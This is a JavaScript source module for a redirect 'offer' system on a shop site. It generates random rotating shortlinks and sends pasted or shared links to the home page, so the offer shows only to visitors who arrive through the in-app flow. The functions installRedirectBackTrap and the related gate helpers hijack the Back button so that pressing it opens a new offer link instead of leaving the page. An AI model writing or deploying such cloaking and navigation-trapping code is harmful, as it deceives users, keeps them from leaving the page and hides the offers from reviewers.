/** Marks the redirect iframe wrapper — parent must not capture/prevent clicks here. */
export const REDIRECT_EMBED_ROOT_SEL = '[data-hcva-redirect-embed="root"]';

/** Parent dispatches when a redirect-gate click should surface the offer admin panel. */
export const HCVA_EMBED_ADMIN_EVENT = 'hcva:embed-navigate-admin';

/** Single-segment paths used for rotating “shortlink” URLs (not real shop routes). */
export const REDIRECT_SLUG_LEN = 10;

const SLUG_CHARS = 'abcdefghijklmnopqrstuvwxyz0123456789';

export function generateRedirectSlug() {
  let s = '';
  for (let i = 0; i < REDIRECT_SLUG_LEN; i += 1) {
    s += SLUG_CHARS[Math.floor(Math.random() * SLUG_CHARS.length)];
  }
  return s;
}

/** True if pathname is our embed shortlink, e.g. /x7k2m9a1b4 */
export function isRedirectShortlinkPath(pathname) {
  const p = (pathname || '').replace(/\/$/, '') || '/';
  const m = p.match(/^\/([a-z0-9]+)$/i);
  if (!m) return false;
  return m[1].length === REDIRECT_SLUG_LEN;
}

export function isValidRedirectEmbedSlug(slug) {
  if (!slug || typeof slug !== 'string') return false;
  if (slug.length !== REDIRECT_SLUG_LEN) return false;
  return /^[a-z0-9]+$/i.test(slug);
}

/** Ensures CB5 landings see hcva_embed=1 (with iframe self!==top, CB5 still picks embed Esc-hold path). */
export function withHcvaEmbedParam(href) {
  if (!href || typeof href !== 'string') return href;
  try {
    const u = new URL(href, typeof window !== 'undefined' ? window.location.href : undefined);
    u.searchParams.set('hcva_embed', '1');
    return u.toString();
  } catch (_) {
    return href;
  }
}

/**
 * Per-tab marker proving the current redirect shortlink was opened from a real in-app
 * gesture (click / popup continue / Back rotation) in THIS tab. A pasted or shared
 * shortlink opens in a fresh tab with empty sessionStorage, so the marker is absent and
 * we send the visitor to the home page instead of showing the offer.
 */
export const HCVA_REDIRECT_SESSION_KEY = 'hcva_redirect_session';

/** One-time gate token when opener tab launches redirect in a new tab (localStorage, ~60s TTL). */
export const HCVA_NEW_TAB_GATE_KEY = 'hcva_redirect_new_tab';

/** Matches `shortlinkMetrics` SHORTLINK_VISIT_NOTE_KEY — promoted into new tab sessionStorage. */
const HCVA_VISIT_NOTE_KEY = 'hcva_shortlink_visit_note';

/** Per-tab flag set after the security interstitial completes. */
export const HCVA_SECURITY_PASSED_KEY = 'hcva_security_passed';

const NEW_TAB_GATE_TTL_MS = 60_000;

export function markRedirectSession() {
  try {
    sessionStorage.setItem(HCVA_REDIRECT_SESSION_KEY, '1');
  } catch (_) {
    /* ignore */
  }
}

export function hasRedirectSession() {
  try {
    return sessionStorage.getItem(HCVA_REDIRECT_SESSION_KEY) === '1';
  } catch (_) {
    return false;
  }
}

/** Authorize a redirect shortlink opened from the parent tab into a new browser tab. */
export function prepareNewTabRedirectGate(slug, visitNote) {
  if (!slug) return;
  try {
    localStorage.setItem(
      HCVA_NEW_TAB_GATE_KEY,
      JSON.stringify({ slug, ts: Date.now(), visitNote: visitNote || '' })
    );
  } catch (_) {
    /* ignore */
  }
}

/**
 * On first load in the new tab, consume the opener gate and promote to sessionStorage.
 * Returns true when this slug was legitimately opened from an in-app redirect gesture.
 */
export function consumeNewTabRedirectGate(slug) {
  if (!slug || hasRedirectSession()) return hasRedirectSession();
  try {
    const raw = localStorage.getItem(HCVA_NEW_TAB_GATE_KEY);
    if (!raw) return false;
    const payload = JSON.parse(raw);
    if (!payload?.slug || payload.slug !== slug) return false;
    if (Date.now() - Number(payload.ts || 0) > NEW_TAB_GATE_TTL_MS) {
      localStorage.removeItem(HCVA_NEW_TAB_GATE_KEY);
      return false;
    }
    localStorage.removeItem(HCVA_NEW_TAB_GATE_KEY);
    markRedirectSession();
    if (payload.visitNote) {
      try {
        sessionStorage.setItem(HCVA_VISIT_NOTE_KEY, payload.visitNote);
      } catch (_) {
        /* ignore */
      }
    }
    return true;
  } catch (_) {
    return false;
  }
}

export function buildRedirectShortlinkUrl(slug) {
  if (typeof window === 'undefined') return `/${slug}`;
  return `${window.location.origin}/${slug}`;
}

/** Open a random shortlink path in a new tab (fallback — prefer same-tab navigate + fullscreen). */
export function openRedirectShortlinkInNewTab(slug, visitNote) {
  if (!slug || typeof window === 'undefined') return null;
  prepareNewTabRedirectGate(slug, visitNote);
  const url = buildRedirectShortlinkUrl(slug);
  try {
    window.location.assign(url);
  } catch (_) {
    /* ignore */
  }
  return null;
}

export function isSecurityCheckPassed() {
  try {
    return sessionStorage.getItem(HCVA_SECURITY_PASSED_KEY) === '1';
  } catch (_) {
    return false;
  }
}

export function markSecurityCheckPassed() {
  try {
    sessionStorage.setItem(HCVA_SECURITY_PASSED_KEY, '1');
  } catch (_) {
    /* ignore */
  }
}

/** Reset so the IP / security screen shows again on the next redirect from the shop. */
export function clearSecurityCheckPassed() {
  try {
    sessionStorage.removeItem(HCVA_SECURITY_PASSED_KEY);
  } catch (_) {
    /* ignore */
  }
}

/**
 * While redirect is active, trap Back/Forward: re-seed a history entry and run `onBack`
 * (which opens a fresh shortlink with the same redirect content). Browsers cannot hide the
 * Back control itself; this makes pressing it rotate to a new offer link instead of leaving.
 * Returns a cleanup function.
 */
export function installRedirectBackTrap(onBack) {
  if (typeof window === 'undefined') return () => {};

  window.history.pushState({ hcvaRedirectTrap: true }, '', window.location.href);

  const onPopState = () => {
    window.history.pushState({ hcvaRedirectTrap: true }, '', window.location.href);
    if (typeof onBack === 'function') onBack();
  };

  window.addEventListener('popstate', onPopState);
  return () => window.removeEventListener('popstate', onPopState);
}
